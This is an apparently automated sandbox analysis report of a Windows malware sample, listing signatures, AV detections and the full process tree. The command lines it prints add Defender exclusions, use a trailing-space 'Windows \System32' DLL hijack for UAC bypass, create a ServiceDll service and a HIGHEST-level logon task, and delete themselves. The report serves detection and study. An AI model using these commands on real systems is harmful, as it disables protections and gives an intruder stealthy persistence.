Windows Analysis Report
Ld0f3NDosJ.exe

Overview

General Information

Sample name: Ld0f3NDosJ.exe
(renamed because original name is a hash value)
Original sample name: 00948444f3e248047722667419d54205.exe
Analysis ID: 1496433
MD5: 00948444f3e248047722667419d54205
SHA1: ca291799966f2a1d8ec8cdab92daa6883bddac9e
SHA256: c97c029e6368bf6502e9c9c9ee0fc079c61da9e79c3798e8a246d19446b5afa8
Tags: exe
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates a Windows Service pointing to an executable in C:\Windows
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Self deletion via cmd or bat file
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Ld0f3NDosJ.exe (PID: 3552 cmdline: "C:\Users\user\Desktop\Ld0f3NDosJ.exe" MD5: 00948444F3E248047722667419D54205)
    • cmd.exe (PID: 5236 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6772 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5088 cmdline: cmd.exe /c start "" "C:\Users\user\Desktop\pyld64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • pyld64.exe (PID: 4388 cmdline: "C:\Users\user\Desktop\pyld64.exe" MD5: 43BCE45D873189F9AE2767D89A1C46E0)
        • cmd.exe (PID: 7072 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5412 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 6252 cmdline: cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • usvcinsta64.exe (PID: 2736 cmdline: "C:\Windows\System32\usvcinsta64.exe" MD5: 11DDC0A34BAC7AB099D2EE8D9817BF58)
            • cmd.exe (PID: 4156 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 6600 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 4044 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 5564 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 6728 cmdline: cmd.exe /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 4888 cmdline: cmd.exe /c start "" "C:\Windows \System32\printui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • printui.exe (PID: 4388 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
            • cmd.exe (PID: 880 cmdline: cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • timeout.exe (PID: 1948 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • cmd.exe (PID: 6700 cmdline: cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 2732 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • cmd.exe (PID: 4392 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2820 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 5668 cmdline: cmd.exe /c sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f && sc start x543664 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 6928 cmdline: sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • reg.exe (PID: 7072 cmdline: reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • sc.exe (PID: 2812 cmdline: sc start x543664 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • cmd.exe (PID: 5836 cmdline: cmd.exe /c start "" "C:\Windows\System32\console_zero.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • console_zero.exe (PID: 2224 cmdline: "C:\Windows\System32\console_zero.exe" MD5: 74CF33F8C2FCB56F749AAF411B9AE302)
            • cmd.exe (PID: 7064 cmdline: cmd.exe /c schtasks /delete /tn "console_zero" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 6904 cmdline: schtasks /delete /tn "console_zero" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 6564 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 4392 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • cmd.exe (PID: 6644 cmdline: cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 2744 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • cmd.exe (PID: 5020 cmdline: cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\Ld0f3NDosJ.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 2332 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • svchost.exe (PID: 4816 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5564 cmdline: C:\Windows\System32\svchost.exe -k DcomLaunch MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 4892 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5048 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6308 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3492 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4888 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3908 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 7032 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 6252 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 3800 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 6600 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 880 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 6076 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 4328 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 6928 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 1484 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 6308 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 1864 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 3884 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 6728 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 6244 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 1056 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 4996 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 2784 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 1424 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
  • console_zero.exe (PID: 7040 cmdline: C:\Windows\System32\console_zero.exe MD5: 74CF33F8C2FCB56F749AAF411B9AE302)
    • cmd.exe (PID: 6488 cmdline: cmd.exe /c schtasks /delete /tn "console_zero" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5820 cmdline: schtasks /delete /tn "console_zero" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7080 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7020 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\printui.exe" , CommandLine: "C:\Windows \System32\printui.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\printui.exe, NewProcessName: C:\Windows \System32\printui.exe, OriginalFileName: C:\Windows \System32\printui.exe, ParentCommandLine: cmd.exe /c start "" "C:\Windows \System32\printui.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4888, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows \System32\printui.exe" , ProcessId: 4388, ProcessName: printui.exe
Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Windows\System32\usvcinsta64.exe, ProcessId: 2736, TargetFilename: C:\Windows \System32\printui.dll
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 2224, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 6564, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Ld0f3NDosJ.exe", ParentImage: C:\Users\user\Desktop\Ld0f3NDosJ.exe, ParentProcessId: 3552, ParentProcessName: Ld0f3NDosJ.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", ProcessId: 5236, ProcessName: cmd.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f && sc start x543664, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5668, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 6928, ProcessName: sc.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x543664\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x543664.dat" /f && sc start x543664, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5668, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 6928, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5236, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'", ProcessId: 6772, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 4816, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exe, ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exe, Virustotal: Detection: 64%
Source: C:\Users\user\Desktop\pyld64.exe, ReversingLabs: Detection: 18%
Source: C:\Users\user\Desktop\pyld64.exe, Virustotal: Detection: 64%
Source: C:\Windows \System32\printui.dll, ReversingLabs: Detection: 62%
Source: C:\Windows\System32\console_zero.exe, ReversingLabs: Detection: 18%
Source: C:\Windows\System32\usvcinsta64.exe, ReversingLabs: Detection: 58%
Source: C:\Windows\System32\x543664.dat, ReversingLabs: Detection: 41%
Source: Ld0f3NDosJ.exe, ReversingLabs: Detection: 52%
Source: Ld0f3NDosJ.exe, Virustotal: Detection: 54%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\pyld64.exe, Joe Sandbox ML: detected
Source: C:\Windows\System32\x543664.dat, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exe, Joe Sandbox ML: detected
Source: Ld0f3NDosJ.exe, Joe Sandbox ML: detected
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA33342D0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,CRYPTO_strdup,OPENSSL_LH_new,OPENSSL_LH_set_thunks,ERR_new,X509_STORE_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,OPENSSL_sk_num,ERR_new,OPENSSL_sk_new_null,ERR_new,OPENSSL_sk_new_null,ERR_new,CRYPTO_new_ex_data,ERR_new,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,53_2_00007FFDA33342D0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333E220 CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,53_2_00007FFDA333E220
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3388B90 BIO_free,BIO_free,BIO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,OPENSSL_cleanse,CRYPTO_free,53_2_00007FFDA3388B90
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3386A60 ERR_new,ERR_set_debug,SetLastError,BIO_write,BIO_test_flags,BIO_test_flags,ERR_new,ERR_set_debug,CRYPTO_free,53_2_00007FFDA3386A60
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3332F50 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,53_2_00007FFDA3332F50
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3388CA0 CRYPTO_zalloc,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_uint,ERR_new,strcmp,OSSL_PARAM_get_uint32,ERR_new,strcmp,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_int,ERR_new,ERR_new,ERR_set_debug,BIO_up_ref,BIO_free,BIO_up_ref,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_CIPHER_is_a,EVP_CIPHER_is_a,53_2_00007FFDA3388CA0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA332D360 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,53_2_00007FFDA332D360
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA3337360 CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,53_2_00007FFDA3337360
